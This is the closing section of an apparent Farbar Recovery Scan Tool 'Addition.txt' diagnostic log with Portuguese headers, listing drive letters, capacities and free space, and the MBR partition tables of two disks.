Drive d: () (Fixed) (Total:397.4 GB) (Free:305.69 GB) NTFS
Drive e: (PIGIRS CIDERSP) (CDROM) (Total:0.02 GB) (Free:0 GB) UDF
Drive g: (Expansion Drive) (Fixed) (Total:931.51 GB) (Free:562.83 GB) NTFS

==================== MBR & Tabela de Partições ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 49C491A8)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=68.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=397.4 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (Size: 931.5 GB) (Disk ID: F6E2412F)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)

==================== Fim de Addition.txt ============================